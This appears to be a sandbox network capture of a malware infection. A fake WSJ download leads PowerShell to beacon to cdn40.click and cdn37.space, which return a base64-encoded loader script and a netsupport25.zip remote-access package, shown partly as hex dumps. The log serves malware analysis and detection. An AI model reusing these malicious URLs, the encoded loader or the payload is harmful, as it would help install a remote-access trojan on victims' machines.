                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:55 UTC255INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:58:54 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 1064965
                                                                                                                Last-Modified: Wed, 24 Apr 2024 11:49:01 GMT
                                                                                                                Connection: close
                                                                                                                ETag: "6628f1ad-104005"
                                                                                                                Accept-Ranges: bytes
                                                                                                                2024-04-25 14:58:55 UTC16129INData Raw: 50 4b 03 04 2d 00 0e 00 08 00 d2 25 98 58 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 52 65 67 69 73 74 72 79 2e 64 61 74 ec 7d 0b 7c 1c c5 99 67 9b a7 31 2f 41 bc 89 20 e0 8c 81 70 10 90 d0 63 24 8d 88 91 67 34 92 2c 61 bd d0 c8 0f 88 88 dd 33 d3 92 c6 1a cd 0c f3 d0 c3 04 32 64 73 c4 17 20 f1 ed de 82 97 00 d1 72 09 eb 1c bf 24 02 f2 70 38 b2 88 cb 0f ec 63 b3 59 e5 f2 db ac 97 90 8d 42 72 59 41 96 8d 8f cd 6d 0c 49 e0 fe ff aa ae 99 d6 68 46 dd 36 36 f8 36 2a e9 9b ee ae fe aa be 67 7d 55 5d 5d dd 9d 34 86 06 57 68 9a 46 50 89 fb a7 9a 07 dc 77 71 7f 7a 21 0e b3 de 8d d4 33 d8 37 64 e5 f5 dd e0 e1 df 0b cd f2 27 ea 56 7c ef c1 9e 73 af bb f7 85 65 95 fe 7b 31 ea b2 1c cb 1a 58 d6 c0 b2 06 96 35 b0 ac 81 65 0d 2c 6b 60 59 03 cb 1a 58 d6 c0 b2 06 4a
                                                                                                                Data Ascii: PK-%XRegistry.dat}|g1/A pc$g4,a32ds r$p8cYBrYAmIhF666*g}U]]4WhFPwqz!37d'V|se{1X5e,k`YXJ
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 3b bb e6 23 84 19 e8 18 ab 3f 3c 3c 3c 96 cb cb cb 11 11 11 b7 b7 b7 22 22 22 61 61 61 59 59 59 57 57 57 de de de bc bc bc f3 f3 f3 c1 c1 c1 18 0c 66 66 66 e6 f4 f4 54 45 45 a5 ad ad ad bf bf 3f 2f 2f 2f 39 39 b9 bc bc 7c 7b 7b bb bb bb 5b 5f 5f 1f 02 81 68 68 68 d0 d0 d0 ec ee ee d6 d6 d6 a2 d1 68 29 29 29 53 53 d3 a2 a2 22 37 37 37 5b 5b 5b 66 66 66 12 12 92 d8 d8 58 01 01 01 46 46 46 79 79 f9 a2 f5 5a f8 a3 c2 98 57 6a ca c6 01 b9 07 56 ce 36 7b 0a d4 ea 6a b8 f3 34 5e 2b 71 71 83 57 0f 1f 92 5f e5 70 49 8b cd 07 fd 39 7a 68 85 9f ed 59 33 4c e4 42 45 83 bd c4 a9 08 71 b1 23 94 58 29 ff 0f 40 3f 3c e5 02 8c 81 c5 f0 6f 88 8a 49 cc 12 e9 16 0e 82 4e e4 e8 bb ea c4 f3 87 26 fc e8 0e 8b 8f 48 3e 68 4b ae 6c 23 f2 76 ce 72 da 6e 97 4e 4f ff 74 af ba 37 93
                                                                                                                Data Ascii: ;#?<<<"""aaaYYYWWWfffTEE?///99|{{[__hhhh)))SS"777[[[fffXFFFyyZWjV6{j4^+qqW_pI9zhY3LBEq#X)@?<oIN&H>hKl#vrnNOt7
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 11 e3 c1 3c c3 78 e0 7b 8c 18 11 95 74 16 46 92 ec 91 24 e0 03 f1 12 f6 65 23 19 fd 25 28 71 5b 95 90 39 b0 ab e7 60 b3 0d b1 a0 26 f4 f8 72 54 52 3f bd 8d 70 f0 0e 7b 8d ee 63 41 7b 92 50 2c 7e 8b 88 d6 ba dc 81 35 d6 6f 9f 2a 54 fe 84 7f bd f8 f7 e0 c2 41 d7 bb af 99 41 39 7f d7 13 e0 7b 40 4b 26 2c e6 94 83 f6 74 f4 a4 99 7e 70 a6 fd 36 67 3b fd 74 d0 cf 39 fa 11 07 53 ba 29 d4 13 72 92 e5 04 5b 94 bb 86 98 95 60 08 c7 da c5 db 61 5a e5 41 ff 18 8a 63 3e ae 5d fc 63 3a a4 51 0a 96 68 63 d8 a3 73 ed 47 1c 9d 0e 0f 82 8d 70 76 f4 18 ff 25 d2 31 5e 69 7c 9e ef 69 5e 46 22 79 2b d6 66 52 24 1f c6 d5 48 4b 11 85 0e 51 c0 12 50 d7 6d 55 da 42 87 8d 2d 22 bb 91 95 82 be e1 fe e9 5c 10 c6 fc 33 53 67 d2 c4 f7 75 af 23 a3 aa 02 bf 2b f0 bb db b1 d6 8c bd 21 e6
                                                                                                                Data Ascii: <x{tF$e#%(q[9`&rTR?p{cA{P,~5o*TAA9{@K&,t~p6g;t9S)r[`aZAc>]c:QhcsGpv%1^i|i^F"y+fR$HKQPmUB-"\3Sgu#+!
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 97 1c 0a f7 7f f4 63 85 46 64 80 94 70 0f d7 15 7a e7 56 f1 21 53 2e dc 8b 55 40 c3 2d 8f c1 3d b7 69 34 9a 3c f9 42 94 1b ff a2 39 b7 fe 17 62 4d de c1 b1 49 30 ac ca f7 67 b9 b7 71 83 81 03 f4 4c 70 a1 a1 01 38 34 a7 fc 07 22 48 db 81 de 39 a1 b6 a2 88 b2 d4 67 39 e5 60 b6 59 1d db b4 5e b8 d1 3c 80 ac da a9 46 c3 53 58 f8 81 48 73 3f be b4 e0 d1 d8 c5 e3 59 a4 99 52 1f 16 8e 34 f3 40 09 54 a3 1f 02 b5 45 29 23 77 26 51 d8 4f 62 3b 4e 20 49 de e3 37 fc 15 79 02 72 2d dc 1a 0b 6d 18 6f 86 93 4c 47 f7 b6 6c ca b4 35 cd 6d 24 9f ce 80 a5 d1 5d 5e 05 88 81 24 3f 5e 02 32 db 40 db 52 24 9e 06 63 d2 d0 82 9b b0 68 5a 3e d3 ae 47 5a 8b be 5a 6f 25 2e 43 9c 81 1f d3 13 cc bf 02 d1 b4 e9 1e 46 dc a9 b1 b7 02 c9 f2 57 d5 0a 7b c5 00 be 4f a1 ee 1f 04 d8 d7 43 3d
                                                                                                                Data Ascii: cFdpzV!S.U@-=i4<B9bMI0gqLp84"H9g9`Y^<FSXHs?YR4@TE)#w&QOb;N I7yr-moLGl5m$]^$?^2@R$chZ>GZZo%.CFW{OC=
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 53 b6 17 c0 5f 5d 3a 1b 7e a2 82 2c 0a 98 9f cf 0a 66 ab a5 05 7c 37 40 42 70 d0 83 1b 1e 81 02 9d 28 6e 12 a2 48 dc fc a9 0d e9 c3 c5 cd 61 56 6c 11 dc e2 e4 6f 4d 42 b1 cf 79 f8 e5 e5 22 c4 e6 7b 82 6a b1 05 2e 2e 8f a7 03 3b 88 f9 a7 f3 ef 7e 11 1d 75 36 06 44 6e 84 83 93 27 ab f6 5e 11 df 83 61 d1 27 a4 e0 77 90 6f 57 21 e6 18 31 af ec 9c be a5 20 ee dc 01 4c 9c 07 62 c7 2a 0d 11 17 d6 0f ec ac 74 db 71 20 68 0e 8c 08 e5 a7 71 22 e8 5d 2e af 63 d3 6a d9 9e 96 17 60 6f c8 13 d2 81 a7 52 f2 a7 e1 c8 cd 98 13 c9 68 19 9d 9e 09 ff cf 54 63 ef e7 74 cd 22 0e f9 84 73 ca 56 a9 59 8a 3c 7c f5 0d a8 ac 9c 16 46 75 99 3d 26 8d d8 40 01 b6 9c 1e 57 db a6 1a f8 ec f2 0e eb 95 08 a7 1d ce f7 54 27 69 0e c9 f0 dc 19 00 83 c5 7a 3c c1 0c 04 3d 57 61 07 e9 25 1e 6e
                                                                                                                Data Ascii: S_]:~,f|7@Bp(nHaVloMBy"{j..;~u6Dn'^a'woW!1 Lb*tq hq"].cj`oRhTct"sVY<|Fu=&@WT'iz<=Wa%n
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 33 02 f1 a3 e8 fd 23 f4 f9 9d 15 ff 17 fa fc cb b9 e3 fb fc 92 fc ff 33 7d fe b9 b3 8e e9 f3 d5 4f ff 4f f4 f9 1f 3e 91 ea f3 0b fe df d1 f9 bd 67 8e ef f3 2f f2 19 92 a2 f3 f6 14 9d e7 27 e8 fc 9a 14 9d c3 8b 44 bf be d6 be 11 52 27 16 e5 9a cb ec da 14 a9 9f 0b a9 2f 80 d4 c5 5f 31 92 61 97 a4 88 7a 96 24 5c bd e6 88 7d 7e 92 e0 cf 4d dd c3 57 32 7c 44 dd 05 00 56 c2 5c f8 ab 8f 21 7b 9b 76 8e 23 fb f7 7e 90 1a 02 99 5a 1a f5 f3 f0 67 0e f5 57 e4 ba 07 2a d4 34 92 98 c8 ad af cd 4b f6 b2 fd 37 cc c7 22 2b 2f 30 da b2 5d ab e7 31 0d 98 6d b9 b2 0b 84 70 80 80 a0 66 c4 ab 60 31 d1 b2 e4 8a 75 d7 5d 9e ee 09 c6 a1 23 fa 69 fd d5 94 5b ad 66 cf 46 7b 2a b6 03 e7 9c a2 b6 0b 53 b5 09 f6 b8 f1 9c 97 49 d0 a5 4f 78 56 d0 33 fa cc f5 2e 2e 77 5b e3 d3 19 f8 44
                                                                                                                Data Ascii: 3#3}OO>g/'DR'/_1az$\}~MW2|DV\!{v#~ZgW*4K7"+/0]1mpf`1u]#i[fF{*SIOxV3..w[D
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: d8 cf 35 e4 6a 17 0d c5 0d 9f cf 9b b5 8b 16 65 ba 76 d1 0a 61 ff 5b 50 3d 26 ec 17 01 06 e0 46 a7 68 a7 ff 0e 0d b1 cd aa 8b c2 b0 c1 a6 d2 00 33 e2 13 07 a6 19 12 31 d3 21 6a 31 62 d3 b1 5c 4e 0b a0 1f 18 3c a6 b4 fb 9d d8 80 fd 31 6c a5 a3 2b 94 9a 1e 5a 56 c4 6c 4d c2 d2 9b 81 e5 9f 93 26 2b 3d 9c 01 81 83 dd f9 1f a7 e1 89 2e c7 06 b0 5c bb 01 18 07 b5 db 96 ea 61 12 47 ea dc 60 4e be 55 bd a6 42 41 8f 19 aa ab 98 b3 62 c1 81 d4 ad f7 20 2b 8b 10 10 dd d2 7d 33 5e 78 79 06 12 31 10 0d 35 3d 52 90 ae 47 e6 22 2d f2 c2 4c 60 10 29 c8 d0 7f 3c 87 b2 46 b2 28 32 62 c7 6f 80 cf bb 08 fa 0e bb 8f 46 be 89 e5 26 6d f1 04 3d fb e0 88 73 e1 88 a1 bf 9b 8e 1c 35 86 86 9e de 58 c9 0e b1 a6 20 73 05 3d 13 48 96 1d 25 59 e6 43 de a2 98 2c 6b 84 2c 3b aa 7e 0c 59
                                                                                                                Data Ascii: 5jeva[P=&Fh31!j1b\N<1l+ZVlM&+=.\aG`NUBAb +}3^xy15=RG"-L`)<F(2boF&m=s5X s=H%YC,k,;~Y
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: e4 3c 80 2d 87 2d a7 62 02 af d7 55 30 77 fb 06 32 c8 d5 43 da 66 d6 b3 f8 31 62 46 7b a0 ae 45 72 ca 18 ce cc 01 02 6b 2d 03 6a 0c f5 e7 f2 34 df 04 03 df f2 6e c0 37 0b 3c ff 88 04 e0 c1 0a 70 e0 fc 30 62 a4 88 ff 8a 07 ea f4 ef f5 54 d2 6a 3f 0e 01 a0 1c 14 83 8a ed 87 87 1d e6 5d 24 cf 66 46 ae 65 71 c3 e1 f4 0b 24 c4 de 6e b5 1f bd 2c e3 7b 89 8c 50 d8 b2 e4 17 87 d3 cf 48 c6 ff 34 0e ca 66 77 ef 4e 8d ff 54 76 a7 5e 5e e7 ff 66 77 92 9b 2e e5 45 ac 7e ca ca 5a 5b c4 f0 27 f7 70 ba e3 bf a6 88 ed cd dc 2e e4 97 3e 58 65 e9 92 fd a7 b2 32 c9 20 96 30 72 65 a6 a0 91 01 26 f1 32 54 3d 40 41 7f ee 58 d5 d2 4e 1f 76 c4 f3 67 66 fa dd 2a d6 b5 bf 45 3f d0 2c 7b 57 f6 ef bb 5a 5b e0 57 65 01 1a 15 d5 58 d2 a5 d2 49 30 a3 2b 78 90 14 19 c4 d1 66 1e f2 a7 25
                                                                                                                Data Ascii: <--bU0w2Cf1bF{Erk-j4n7<p0bTj?]$fFeq$n,{PH4fwNTv^^fw.E~Z['p.>Xe2 0re&2T=@AXNvgf*E?,{WZ[WeXI0+xf%
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 6c 96 01 48 e1 4f f2 31 4d a9 c6 5e 60 b9 45 2b 96 2f 39 75 cc 8b e3 61 44 8c cc f6 88 65 3d 19 51 c1 db 16 f0 8d 86 46 59 02 af 97 18 5a 5b f5 bd 2c 3f d8 5a 45 85 0d 8b 8a ef 14 28 43 1e 2d 79 26 92 d3 4e 81 b2 2f 61 22 4c ed 68 e5 70 93 52 62 d4 37 1b 95 b7 4d 31 f0 47 b3 51 df 14 6b 52 de 06 35 c5 5a ee c1 9a 86 be 96 2d 0e ad 96 5e ad ad 36 43 95 0d ee a9 ae ae 66 f5 67 d8 d2 5a 66 47 70 a9 6f 90 a1 b1 86 46 dd 1b de 49 91 5c d0 09 a3 b2 29 3e 21 91 74 a5 be 45 59 e4 af 1a 5e 2f 83 19 fc 32 1f 98 01 63 8c fa 9d c6 65 c7 8d 0b 8e 88 8e 33 c6 ec e3 23 5d 7c 8c ca ed bc d2 db ed a4 51 b9 d7 d6 af 0a 1e 2b 7a ca 9b 33 2a b7 ea 3d f9 cf 2c 47 9b d1 3f 11 5e 68 32 df ca 47 49 82 cc 7b 8c 31 5b f6 ec e1 95 3b f9 1a e3 82 8b 21 ca bd 52 43 77 37 d4 b7 76 5f
                                                                                                                Data Ascii: lHO1M^`E+/9uaDe=QFYZ[,?ZE(C-y&N/a"LhpRb7M1GQkR5Z-^6CfgZfGpoFI\)>!tEY^/2ce3#]|Q+z3*=,G?^h2GI{1[;!RCw7v_
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 12 2a 36 ef 5e f8 f0 c4 f0 21 ee bc f7 f7 9f b6 f6 6d b1 75 93 16 a6 ac fa e3 b1 2f d4 79 b1 df 1e 5e 49 87 21 c9 fb 56 0d ea e1 72 de fc 6d b7 9a 10 ed 03 57 a6 8d 7b fd ad ef 76 7c 94 fc dd d5 94 87 8e b8 8f da fa ea 17 b9 c9 2f 8d bc 7e ec b0 be a7 f7 b0 b1 83 87 26 65 f4 2d 7b 33 e4 bc 51 bb f6 66 d2 37 97 4e 9f 0c f8 26 dd e3 f1 8d 65 7e 3f 7b bc a0 6e c8 9e 39 30 e7 8a e9 05 fd 33 ba e5 8f bd 92 7d e2 91 43 5b 1e 3b 11 ee 5f b5 b9 f0 03 bf af 7b 53 27 a5 86 95 bf 52 f2 c5 df c7 46 5c 1e f4 63 d1 9b e3 a6 dc 59 3d a5 70 e6 33 11 ef fe 58 38 eb 87 3f 86 bf 92 fb 65 dd 8d b3 a7 bb 5d da 65 fa 24 93 4b bd fe af ab 73 de ce 96 ec 7e e3 35 e5 73 ba aa f9 9b 5b 12 4f ea aa 2f 56 94 85 67 a7 5c 4e ac 5e 72 e0 51 6b 6b df cc e4 b8 e3 83 ae 7c fc e2 81 1d 73
                                                                                                                Data Ascii: *6^!mu/y^I!VrmW{v|/~&e-{3Qf7N&e~?{n903}C[;_{S'RF\cY=p3X8?e]e$Ks~5s[O/Vg\N^rQkk|s


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                62192.168.2.174979220.114.59.183443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:59:05 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                2024-04-25 14:59:06 UTC560INHTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                MS-CorrelationId: 51cc4dd7-6fad-4d0d-a34e-0818a02e123d
                                                                                                                MS-RequestId: 22166074-40f3-4fb5-8de0-9c5450d6f55d
                                                                                                                MS-CV: vhzAqRXc0EuwsOTB.0
                                                                                                                X-Microsoft-SLSClientCache: 2160
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Thu, 25 Apr 2024 14:59:05 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 25457
                                                                                                                2024-04-25 14:59:06 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                2024-04-25 14:59:06 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                63192.168.2.1749790103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:59:11 UTC694OUTGET /download.php HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:59:12 UTC215INHTTP/1.1 302 Found
                                                                                                                Date: Thu, 25 Apr 2024 14:59:11 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Location: https://cdn40.click/files/WSJ.msix
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                64192.168.2.174979723.133.88.1904437788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:59:36 UTC400OUTGET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1
                                                                                                                User-Agent: myUserAgentHere
                                                                                                                Host: cdn40.click
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-04-25 14:59:37 UTC263INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:59:37 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: *
                                                                                                                ETag: W/"718-/ZXthgoVdoy5VFHqHSmSrGEbAlc"
                                                                                                                2024-04-25 14:59:37 UTC1828INData Raw: 37 31 38 0d 0a 4a 41 42 6d 41 47 34 41 5a 41 42 70 41 48 49 41 49 41 41 39 41 43 41 41 49 67 42 44 41 44 6f 41 58 41 42 51 41 48 49 41 62 77 42 6e 41 48 49 41 59 51 42 74 41 45 51 41 59 51 42 30 41 47 45 41 58 41 42 75 41 47 55 41 64 41 42 7a 41 48 55 41 63 41 42 77 41 47 38 41 63 67 42 30 41 43 49 41 43 67 41 6b 41 47 59 41 62 67 41 67 41 44 30 41 49 41 41 69 41 43 51 41 4b 41 41 6b 41 47 59 41 62 67 42 6b 41 47 6b 41 63 67 41 70 41 46 77 41 62 67 42 6c 41 48 51 41 63 77 42 31 41 48 41 41 63 41 42 76 41 48 49 41 64 41 41 75 41 48 6f 41 61 51 42 77 41 43 49 41 43 67 41 6b 41 47 6b 41 64 51 42 6b 41 46 59 41 59 51 42 73 41 48 55 41 5a 51 41 67 41 44 30 41 49 41 41 69 41 44 6b 41 4d 41 42 6b 41 47 45 41 59 67 41 32 41 47 59 41 4f 51 41 74 41 44 45 41 4d 51
                                                                                                                Data Ascii: 718JABmAG4AZABpAHIAIAA9ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABuAGUAdABzAHUAcABwAG8AcgB0ACIACgAkAGYAbgAgAD0AIAAiACQAKAAkAGYAbgBkAGkAcgApAFwAbgBlAHQAcwB1AHAAcABvAHIAdAAuAHoAaQBwACIACgAkAGkAdQBkAFYAYQBsAHUAZQAgAD0AIAAiADkAMABkAGEAYgA2AGYAOQAtADEAMQ


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                65192.168.2.174979886.104.72.1574437788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:59:38 UTC238OUTGET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsd&iud=90dab6f9-11b1-408a-af36-86b217e34b87 HTTP/1.1
                                                                                                                User-Agent: myUserAgentHere
                                                                                                                Host: cdn37.space
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-04-25 14:59:39 UTC254INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:59:39 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 42
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: *
                                                                                                                ETag: W/"2a-VXbnLaPf6Han7xE4R01i7jGMbpw"
                                                                                                                2024-04-25 14:59:39 UTC42INData Raw: 68 74 74 70 73 3a 2f 2f 63 64 6e 33 37 2e 73 70 61 63 65 2f 66 69 6c 65 73 2f 6e 65 74 73 75 70 70 6f 72 74 32 35 2e 7a 69 70
                                                                                                                Data Ascii: https://cdn37.space/files/netsupport25.zip


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                66192.168.2.174979986.104.72.1574437788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:59:39 UTC59OUTGET /files/netsupport25.zip HTTP/1.1
                                                                                                                Host: cdn37.space
                                                                                                                2024-04-25 14:59:39 UTC246INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:59:39 GMT
                                                                                                                Content-Type: application/zip
                                                                                                                Content-Length: 2254634
                                                                                                                Last-Modified: Fri, 12 Apr 2024 14:59:37 GMT
                                                                                                                Connection: close
                                                                                                                ETag: "66194c59-22672a"
                                                                                                                Accept-Ranges: bytes
                                                                                                                2024-04-25 14:59:39 UTC16138INData Raw: 50 4b 03 04 14 00 00 00 00 00 eb 86 8c 58 00 00 00 00 00 00 00 00 00 00 00 00 07 00 20 00 63 6c 69 65 6e 74 2f 55 54 0d 00 07 4a 3d 19 66 4c 3d 19 66 4a 3d 19 66 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 50 4b 03 04 14 00 08 00 08 00 6d 8a 7a 58 00 00 00 00 00 00 00 00 77 02 00 00 13 00 20 00 63 6c 69 65 6e 74 2f 63 6c 69 65 6e 74 33 32 2e 69 6e 69 55 54 0d 00 07 7e e7 02 66 4a 3d 19 66 4a 3d 19 66 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 5d 51 d1 6e 9b 40 10 7c 47 e2 47 fa 80 c0 36 76 e4 e6 9a 02 ae b1 1b 53 90 21 7d 89 23 eb 02 6b fb d4 eb 1d b9 3b 94 f0 f7 dd 23 28 b5 f2 c4 ce ec ec 68 6e f0 df c2 70 ba 08 c3 66 e1 3a ae f3 98 70 06 c2 3c b9 ce b1 55 a0 71 24 81 eb 44 fc 95 f6 3a 17 95 6c 89 8f b0 33 72 9b ac 13 29 4e ec 6c f7 2b a6 e9 33 87 e4
                                                                                                                Data Ascii: PKX client/UTJ=fL=fJ=fuxPKmzXw client/client32.iniUT~fJ=fJ=fux]Qn@|GG6vS!}#k;#(hnpf:p<Uq$D:l3r)Nl+3
                                                                                                                2024-04-25 14:59:39 UTC16384INData Raw: fb bd 5a 31 ce cb 9e 95 3c ae 6a f5 40 cc 34 7d 73 a6 66 44 0b 50 b5 77 92 a3 df 86 67 e3 cb f4 d2 1e a5 95 cf b3 f7 ec f8 50 2f 25 8a bd 1f c6 1b e1 76 ec f7 5f 8d bd ac aa 1f 68 a0 d3 b4 dc 19 e9 6a b8 c6 40 96 04 69 55 69 5f eb 85 8e d6 5d 85 02 a7 ce 5a 5f 97 c9 49 a3 a0 19 c9 3c 5c 78 ad c4 25 33 73 e3 1f 91 e6 e4 2b 01 64 0a ad be f9 87 4f 61 cc 8e 4c dc 5e f2 63 ba 31 46 3d 43 db 83 89 50 f2 e7 e3 20 26 7e 8f 8f ff 3a 1e 99 77 9f 3a 8e 97 80 67 73 91 b9 d7 25 27 c2 c8 43 b1 90 4d 0e 1e 41 82 ac d5 ba 8b 52 69 22 8f d3 4a 5a a0 e2 e4 79 bc c8 a4 ca aa 3c 64 e2 36 4f 47 0a cd 8d 33 50 10 85 06 71 a0 2c 6a 14 77 52 79 91 45 ae 3f 1e ad 7a dc 66 60 07 69 62 ee 1a 1d fc fd 08 a5 9d dd 88 09 76 ef 69 14 e1 cd 6c 7a b7 5b 41 39 a1 5d 62 3f d6 ff 1f b4 cf
